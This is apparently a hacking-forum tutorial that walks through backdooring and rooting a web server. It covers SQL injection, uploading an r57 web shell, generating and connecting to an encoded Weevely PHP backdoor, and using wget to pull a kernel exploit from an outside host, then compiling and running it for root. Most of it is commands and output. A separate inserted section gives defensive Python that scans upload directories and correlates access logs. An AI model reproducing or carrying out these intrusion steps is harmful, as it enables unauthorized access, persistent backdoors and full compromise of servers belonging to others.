
BackDoor & Rooting With Backtrack
Today I'm going to post a tutorial on backdooring a server with Backtrack 5.
For this you need a virtual machine with Backtrack 5 installed.

Let's start.
Assume our target site is http://target.com/
We have already gained access to the site's admin panel via SQL injection (we assume the site was vulnerable to SQL injection).

Admin Panel: http://target.com/admin/index.php

After logging into the admin panel we have uploaded our shell (r57.php).
Shell location on server: http://target.com/uploads/r57.php

Now run your VMware >> Backtrack 5.
The game starts now.
Backdooring a server with an encrypted PHP backdoor.. amazing!


root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

Where
-p = your password to access the backdoor
-g = generate a new encrypted PHP file (it doesn't actually encrypt the file, it encodes it)
-o = specify your output file

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p rustles

+ Backdoor file 'bdoor.php' created with password 'rustles'.

Now go and check your desktop. There will be an encrypted PHP file, bdoor.php.

=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location

Now we have to connect to our encrypted bdoor.php


root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://target.com/uploads/bdoor.php -p rustles

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Directory listing successful.

[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!

[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp

Directory pcp Successfully Created.

[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a

Linux 2.6.32 kernel (assumed)

[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-

[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp]  Rooted 

Enjoy!
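
Seen from the defender's side, the steps above leave two artifacts: script files inside an upload directory, and web requests that reach them. The check below is an added example, not part of the original article; the extension and indicator lists, the combined log format and all sample data are assumptions constructed for illustration (only the file names and the /uploads/ path come from the article).

```python
import os, re, tempfile

# Extensions a PHP handler may execute (assumed list; match it to your server config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Calls often used to decode and run an encoded payload (assumed indicator list).
DECODERS = re.compile(rb"\b(eval|assert|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
# Combined log format: client, identity, user, [time], "METHOD target PROTO", status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\w+ (\S+) [^"]*" (\d{3})')

def scan_uploads(root):
    """Any script under an upload directory is a finding, whatever its content."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in filter(SCRIPT_EXT.search, files):
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            found = {m.group(1).lower().decode() for m in DECODERS.finditer(data)}
            longest = max(map(len, data.splitlines()), default=0)
            hits[rel] = {"decoders": sorted(found), "longest_line": longest, "clients": set()}
    return hits

def correlate(hits, log_lines, url_prefix="/uploads/"):
    """Attach the client addresses that successfully requested each flagged script."""
    for m in filter(None, map(LOG_LINE.match, log_lines)):
        client, target, status = m.groups()
        rel = target.split("?", 1)[0][len(url_prefix):]
        if target.startswith(url_prefix) and status == "200" and rel in hits:
            hits[rel]["clients"].add(client)
    return hits

def demo():
    # Constructed, inert samples; only the file names and /uploads/ path come from the article.
    files = {"bdoor.php": b'<?php $p = base64_decode("' + b"QUFB" * 200 + b'"); eval($p); ?>\n',
             "r57.php": b"<?php echo 'placeholder'; ?>\n",
             "photo.jpg": b"\xff\xd8\xff\xe0 constructed image bytes"}
    log = ['203.0.113.7 - - [28/Aug/2012:10:00:01 +0000] "GET /uploads/bdoor.php HTTP/1.1" 200 512',
           '198.51.100.4 - - [28/Aug/2012:10:00:05 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 2048',
           '203.0.113.7 - - [28/Aug/2012:10:00:09 +0000] "GET /uploads/missing.php HTTP/1.1" 404 0']
    with tempfile.TemporaryDirectory() as root:
        for name, body in files.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return correlate(scan_uploads(root), log)

if __name__ == "__main__":
    print(demo())
```

Both .php files are reported because an upload directory should hold no executable scripts at all; the decoder calls and the single very long line are what set the encoded file apart from the placeholder.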

Special ThanX to GeniusHaCkers
Category: Server Rooting | Added by: MaX-HaCker (12.08.28)
Total comments: 1
1 //3Kw1N0x   (13.03.09 9:27 AM) [Entry]
j00 K0p13d 73h 73X7 phr0M 3X 5173 l053rrR

//3Kw1N0x
